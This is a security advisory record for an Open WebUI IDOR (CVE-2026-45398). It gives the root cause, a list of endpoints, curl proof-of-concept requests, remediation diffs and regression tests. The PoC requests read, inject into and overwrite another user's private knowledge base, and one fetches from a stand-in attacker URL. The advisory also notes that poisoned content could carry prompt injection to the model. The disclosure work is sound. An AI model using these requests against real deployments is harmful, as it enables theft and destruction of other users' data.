  "details": "# IDOR: Retrieval API Bypasses Knowledge Base Access Controls\n\n**Author:** Andrew Orr \u003caorr@tenable.com\u003e\n\n## Summary\n\n`_validate_collection_access()` ([PR #22109](https://github.com/open-webui/open-webui/pull/22109)) checks the `user-memory-*` and `file-*` collection name prefixes but does not check knowledge base collections, which use raw UUIDs as collection names. Any authenticated user who knows a private knowledge base UUID can read its content through the retrieval query endpoints, even though the knowledge API correctly denies that user access. The same gap affects the retrieval write endpoints (`/process/text`, `/process/file`, `/process/files/batch`, `/process/web`, `/process/youtube`), allowing an attacker to inject content into or overwrite another user\u0027s knowledge base.\n\nReproduced on `main` at commit `4d058a125` (v0.8.11) on March 26, 2026.\n\n## Severity\n\n- CWE-639: Authorization Bypass Through User-Controlled Key\n- CVSS 3.1: `7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)` -- `AC:H` because exploitation requires knowing a target UUID; `I:H` and `A:H` because the write path allows poisoning or destruction of another user\u0027s knowledge base\n\n## Default Configuration Reachability\n\nReachable in default configuration. All affected endpoints require only `get_verified_user`, not `get_admin_user`, so any non-admin account in a typical multi-user deployment can reach them. The only prerequisite beyond authentication is knowledge of a target knowledge base UUID, which is reflected in the `AC:H` score. However, KB UUIDs are stable identifiers that leak through normal usage rather than secrets (see Prerequisites below).\n\n## Root Cause\n\nKnowledge base embeddings are stored in vector DB collections named with the knowledge base\u0027s UUID (e.g., `550e8400-e29b-41d4-a716-446655440000`). The `_validate_collection_access` function only blocks two specific prefixes:\n\n```python\n# backend/open_webui/routers/retrieval.py lines 2330-2355\ndef _validate_collection_access(collection_names: list[str], user) -\u003e None:\n    if user.role == \"admin\":\n        return\n\n    for name in collection_names:\n        if name.startswith(\"user-memory-\") and name != f\"user-memory-{user.id}\":\n            raise HTTPException(\n                status_code=status.HTTP_403_FORBIDDEN,\n                detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n            )\n        elif name.startswith(\"file-\"):\n            file_id = name[len(\"file-\"):]\n            if not has_access_to_file(\n                file_id=file_id,\n                access_type=\"read\",\n                user=user,\n            ):\n                raise HTTPException(\n                    status_code=status.HTTP_403_FORBIDDEN,\n                    detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n                )\n        # No else clause -- knowledge base UUIDs pass through unchecked\n```\n\nKnowledge base UUIDs do not match either prefix, so the function returns without raising an exception. The query then executes against the vector DB with no further authorization check.\n\n## Vulnerable Endpoints\n\n### Read Endpoints\n\nBoth retrieval query endpoints accept a collection name and call `_validate_collection_access` as their sole authorization gate:\n\n1. `POST /api/v1/retrieval/query/doc` (line 2367) -- single `collection_name`\n2. `POST /api/v1/retrieval/query/collection` (line 2432) -- list of `collection_names`\n\n### Write Endpoints\n\nThe following endpoints accept a `collection_name` parameter and write to the target collection without checking whether the caller owns it:\n\n3. `POST /api/v1/retrieval/process/text` (line 1777) -- appends attacker-controlled content to the target collection\n4. `POST /api/v1/retrieval/process/file` (line 1528) -- validates ownership of the uploaded file but not the destination collection\n5. `POST /api/v1/retrieval/process/files/batch` (line 2578) -- same as above for multiple files\n6. `POST /api/v1/retrieval/process/web` and `POST /api/v1/retrieval/process/youtube` (lines 1810-1811) -- same handler; `overwrite` defaults to `true`, so targeting an existing knowledge base deletes and replaces it\n\n| Endpoint | Read | Write | Overwrite | Access Check |\n|----------|------|-------|-----------|--------------|\n| /query/doc | Yes | -- | -- | Prefix-only (bypassed) |\n| /query/collection | Yes | -- | -- | Prefix-only (bypassed) |\n| /process/text | -- | Yes | -- | None |\n| /process/web | -- | Yes | Yes (default) | None |\n| /process/youtube | -- | Yes | Yes (default) | None (same handler as /process/web) |\n| /process/file | -- | Yes | -- | File only, not collection |\n| /process/files/batch | -- | Yes | -- | File only, not collection |\n\n## Proof of Concept\n\n**Security boundary crossed:** The knowledge base access control system (ownership checks, group-based access grants) is bypassed at the retrieval layer. A non-admin user who knows a private knowledge base UUID can read it, append attacker-controlled content to it, or destroy and replace it through the retrieval API, even though the knowledge API correctly denies the same user access to the same resource.\n\n`open-webui-idor-poc.sh` provides a self-contained Docker lab that stands up the target environment and tests every vulnerable endpoint listed above. See the comments at the top of that file for setup, usage, and configuration options.\n\n### Prerequisites\n\n- Attacker has an authenticated (non-pending) account on the target instance.\n- A victim user has created a private knowledge base containing sensitive documents.\n- Attacker knows the victim\u0027s knowledge base UUID. V4 UUIDs are not guessable, but they are stable identifiers that leak through normal platform usage:\n  - **Access revocation:** A user learns a KB UUID through a shared workspace or group, loses access, and finds the retrieval API still honors the stale UUID. The knowledge API correctly revokes access at request time (`access_grants.py:549-558` dynamically queries current group memberships), but the retrieval API has no equivalent check.\n  - **Model metadata:** When a model is shared with a group, `GET /api/models/list` returns the full `meta.knowledge` array -- including KB UUIDs -- to every user with access to the model, even if they have no access to the referenced knowledge bases (`models.py:58-130`).\n  - **URL leakage:** KB UUIDs appear in browser URLs (`/workspace/knowledge/{id}`, `Knowledge.svelte:260`) and can leak through shared links, browser history, Referrer headers, or proxy logs.\n  - **RAG citation metadata:** KB UUIDs are stored as `source.id` in chat message sources (`middleware.py:1950-1965`, `socket/main.py:880-897`). Shared chats return these sources unfiltered (`chats.py:815-830`).\n\n### Read: Extract Private KB Content\n\nAuthenticate as the attacker:\n\n```bash\nTOKEN=$(curl -s -X POST https://open-webui/api/v1/auths/signin \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"email\": \"attacker@example.com\", \"password\": \"password\"}\u0027 \\\n  | jq -r \u0027.token\u0027)\n```\n\n**Control request:** the knowledge API correctly blocks the attacker:\n\n```bash\ncurl -s https://open-webui/api/v1/knowledge/\u003cvictim_kb_uuid\u003e \\\n  -H \"Authorization: Bearer $TOKEN\"\n```\n\n```json\n{\"detail\": \"You do not have permission to access this resource.\"}\n```\n\n**Exploit request:** the retrieval API returns the same KB\u0027s content without authorization:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/query/doc \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\",\n    \"query\": \"confidential\",\n    \"k\": 50\n  }\u0027\n```\n\nExpected result when vulnerable: the server returns matching document chunks from the victim\u0027s private knowledge base, including text content and metadata (source filenames, file IDs, hashes).\n\nThe `/query/collection` endpoint accepts a list of collection names and behaves identically:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/query/collection \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"collection_names\": [\"\u003cvictim_kb_uuid\u003e\"],\n    \"query\": \"confidential\",\n    \"k\": 50\n  }\u0027\n```\n\n### Write: File Injection via /process/file\n\nThe `/process/file` endpoint validates that the attacker owns the uploaded file but does not validate the target `collection_name`. The attacker uploads a file under their own account, then processes it into the victim\u0027s collection:\n\n```bash\n# Upload attacker\u0027s file\nFILE_ID=$(curl -s -X POST https://open-webui/api/v1/files/ \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -F \"file=@payload.txt;type=text/plain\" \\\n  | jq -r \u0027.id\u0027)\n\n# Process it into the victim\u0027s KB collection\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/file \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"file_id\\\": \\\"$FILE_ID\\\",\n    \\\"collection_name\\\": \\\"\u003cvictim_kb_uuid\u003e\\\"\n  }\"\n```\n\n### Write: Batch File Injection via /process/files/batch\n\nSame pattern as above but accepts multiple files in a single request:\n\n```bash\n# Get the full file object for the attacker\u0027s uploaded file\nFILE_OBJ=$(curl -s https://open-webui/api/v1/files/$FILE_ID \\\n  -H \"Authorization: Bearer $TOKEN\")\n\n# Batch-process into the victim\u0027s KB collection\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/files/batch \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"files\\\": [$FILE_OBJ],\n    \\\"collection_name\\\": \\\"\u003cvictim_kb_uuid\u003e\\\"\n  }\"\n```\n\n### Write: Text Injection via /process/text\n\n`/process/text` appends attacker-controlled content to an existing knowledge base collection:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/text \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"name\": \"injected.txt\",\n    \"content\": \"INJECTED BY ATTACKER: attacker-controlled content\",\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n  }\u0027\n```\n\nThe PoC then verifies that the injected text is returned by a follow-up query against the victim collection.\n\n### Write: YouTube Transcript Replacement via /process/youtube\n\n`/process/youtube` uses the same handler as `/process/web` with the same `overwrite=true` default. This request replaces the victim\u0027s collection with the fetched transcript:\n\n```bash\ncurl -s -X POST https://open-webui/api/v1/retrieval/process/youtube \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"url\": \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\",\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n  }\u0027\n```\n\n### Write: Data Destruction via /process/web\n\n`/process/web` defaults to `overwrite=true`, which deletes the existing collection before writing. The explicit query string below makes the destructive behavior obvious:\n\n```bash\ncurl -s -X POST \"https://open-webui/api/v1/retrieval/process/web?overwrite=true\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"url\": \"https://attacker.com/payload.html\",\n    \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n  }\u0027\n```\n\n## Impact\n\n- **Confidentiality**: Any authenticated user can read private knowledge base contents belonging to other users on the instance.\n- **Integrity**: Attacker-controlled content can be injected into another user\u0027s knowledge base, poisoning downstream RAG results. Injected prompt-injection payloads would be passed to the model when the victim queries the knowledge base.\n- **Availability**: `/process/web` and `/process/youtube` default to `overwrite=true`, letting an attacker delete and replace a victim\u0027s entire knowledge base in a single request.\n\n## Remediation\n\nTwo changes are needed:\n\n1. Add a `permission` parameter to `_validate_collection_access`, use it for both `file-*` and knowledge base checks, and add a knowledge base ownership/access check for collection names that do not match the existing prefixes. `AccessGrants.has_access` already resolves group memberships internally when `user_group_ids` is omitted, matching the pattern used throughout `knowledge.py`.\n\n2. The affected write endpoints must call `_validate_collection_access` with `permission=\"write\"` before operating on the provided `collection_name`.\n\n```diff\n--- a/backend/open_webui/routers/retrieval.py\n+++ b/backend/open_webui/routers/retrieval.py\n@@ -39,4 +39,5 @@\n from open_webui.models.files import FileModel, FileUpdateForm, Files\n from open_webui.utils.access_control.files import has_access_to_file\n from open_webui.models.knowledge import Knowledges\n+from open_webui.models.access_grants import AccessGrants\n from open_webui.storage.provider import Storage\n\n@@ -2330,26 +2331,39 @@\n-def _validate_collection_access(collection_names: list[str], user) -\u003e None:\n+def _validate_collection_access(collection_names: list[str], user, permission: str = \"read\") -\u003e None:\n     if user.role == \"admin\":\n         return\n\n     for name in collection_names:\n         if name.startswith(\"user-memory-\") and name != f\"user-memory-{user.id}\":\n             raise HTTPException(\n                 status_code=status.HTTP_403_FORBIDDEN,\n                 detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n             )\n         elif name.startswith(\"file-\"):\n             file_id = name[len(\"file-\"):]\n-            if not has_access_to_file(\n-                file_id=file_id,\n-                access_type=\"read\",\n-                user=user,\n-            ):\n+            if not has_access_to_file(\n+                file_id=file_id,\n+                access_type=permission,\n+                user=user,\n+            ):\n                 raise HTTPException(\n                     status_code=status.HTTP_403_FORBIDDEN,\n                     detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n                 )\n+        else:\n+            knowledge = Knowledges.get_knowledge_by_id(id=name)\n+            if knowledge and knowledge.user_id != user.id:\n+                if not AccessGrants.has_access(\n+                    user_id=user.id,\n+                    resource_type=\"knowledge\",\n+                    resource_id=name,\n+                    permission=permission,\n+                ):\n+                    raise HTTPException(\n+                        status_code=status.HTTP_403_FORBIDDEN,\n+                        detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n+                    )\n```\n\nThe existing read callers (`/query/doc`, `/query/collection`) use the default `permission=\"read\"` and require no change. Each affected write endpoint needs a validation call after `collection_name` is resolved:\n\n`/process/text` (line 1777):\n\n```diff\n@@ -1783,5 +1783,6 @@\n     collection_name = form_data.collection_name\n     if collection_name is None:\n         collection_name = calculate_sha256_string(form_data.content)\n+    _validate_collection_access([collection_name], user, permission=\"write\")\n\n     docs = [\n```\n\n`/process/web` and `/process/youtube` (lines 1810-1811, same handler):\n\n```diff\n@@ -1824,5 +1824,6 @@\n             collection_name = form_data.collection_name\n             if not collection_name:\n                 collection_name = calculate_sha256_string(form_data.url)[:63]\n+            _validate_collection_access([collection_name], user, permission=\"write\")\n\n             if not request.app.state.config.BYPASS_WEB_SEARCH_EMBEDDING_AND_RETRIEVAL:\n```\n\n`/process/file` (line 1528):\n\n```diff\n@@ -1548,6 +1548,7 @@\n             collection_name = form_data.collection_name\n             if collection_name is None:\n                 collection_name = f\"file-{file.id}\"\n+            _validate_collection_access([collection_name], user, permission=\"write\")\n\n             if form_data.content:\n```\n\n`/process/files/batch` (line 2578):\n\n```diff\n@@ -2593,3 +2593,4 @@\n     collection_name = form_data.collection_name\n+    _validate_collection_access([collection_name], user, permission=\"write\")\n\n     file_results: List[BatchProcessFilesResult] = []\n```\n\n## Regression Test\n\nA regression test should verify that `_validate_collection_access` blocks non-owners from accessing knowledge base collections:\n\n```python\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom fastapi import HTTPException\n\nfrom open_webui.routers.retrieval import _validate_collection_access\n\n\ndef test_validate_collection_access_blocks_non_owner_read():\n    victim_kb_id = \"550e8400-e29b-41d4-a716-446655440000\"\n    attacker = MagicMock()\n    attacker.id = \"attacker-user-id\"\n    attacker.role = \"user\"\n\n    mock_knowledge = MagicMock()\n    mock_knowledge.user_id = \"victim-user-id\"\n\n    with patch(\n        \"open_webui.routers.retrieval.Knowledges.get_knowledge_by_id\",\n        return_value=mock_knowledge,\n    ), patch(\n        \"open_webui.routers.retrieval.AccessGrants.has_access\",\n        return_value=False,\n    ):\n        with pytest.raises(HTTPException) as exc_info:\n            _validate_collection_access([victim_kb_id], attacker)\n        assert exc_info.value.status_code == 403\n\n\ndef test_validate_collection_access_blocks_non_owner_write():\n    victim_kb_id = \"550e8400-e29b-41d4-a716-446655440000\"\n    attacker = MagicMock()\n    attacker.id = \"attacker-user-id\"\n    attacker.role = \"user\"\n\n    mock_knowledge = MagicMock()\n    mock_knowledge.user_id = \"victim-user-id\"\n\n    with patch(\n        \"open_webui.routers.retrieval.Knowledges.get_knowledge_by_id\",\n        return_value=mock_knowledge,\n    ), patch(\n        \"open_webui.routers.retrieval.AccessGrants.has_access\",\n        return_value=False,\n    ):\n        with pytest.raises(HTTPException) as exc_info:\n            _validate_collection_access(\n                [victim_kb_id], attacker, permission=\"write\"\n            )\n        assert exc_info.value.status_code == 403\n```\n\nFor additional coverage, maintainers may want an integration test that creates a knowledge base as one user and confirms that a second user\u0027s retrieval query is rejected end-to-end.\n\n## AI Disclosure\n\nAI assistance was used to help analyze the code paths, develop the PoC workflow, and draft this report.\n\n## Attachments\n\n[open-webui-idor-poc.log](https://github.com/user-attachments/files/26283199/open-webui-idor-poc.log)\n[open-webui-idor-poc.sh](https://github.com/user-attachments/files/26283201/open-webui-idor-poc.sh)\n\n## Tenable\u0027s Disclosure Policy\n\nTenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we\u0027ll issue an advisory on June 24, 2026 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf\n \nThank you for taking the time to read this. We\u0027d greatly appreciate it if you\u0027d acknowledge receipt of this report. If you have any questions we\u0027d be happy to address them.",
  "id": "GHSA-4g37-7p2c-38r9",
  "modified": "2026-05-15T23:55:24Z",
  "published": "2026-05-14T20:26:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45398"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/pull/22109"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI Vulnerable to IDOR: Retrieval API Bypasses Knowledge Base Access Controls"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45398 (GCVE-0-2026-45398)

FKIE_CVE-2026-45398

GHSA-4G37-7P2C-38R9

IDOR: Retrieval API Bypasses Knowledge Base Access Controls

Summary

Severity

Default Configuration Reachability

Root Cause

Vulnerable Endpoints

Read Endpoints

Write Endpoints

Proof of Concept

Prerequisites

Read: Extract Private KB Content

Write: File Injection via /process/file

Write: Batch File Injection via /process/files/batch

Write: Text Injection via /process/text

Write: YouTube Transcript Replacement via /process/youtube

Write: Data Destruction via /process/web

Impact

Remediation

Regression Test

AI Disclosure

Attachments

Tenable's Disclosure Policy

Tags

Sightings

Nomenclature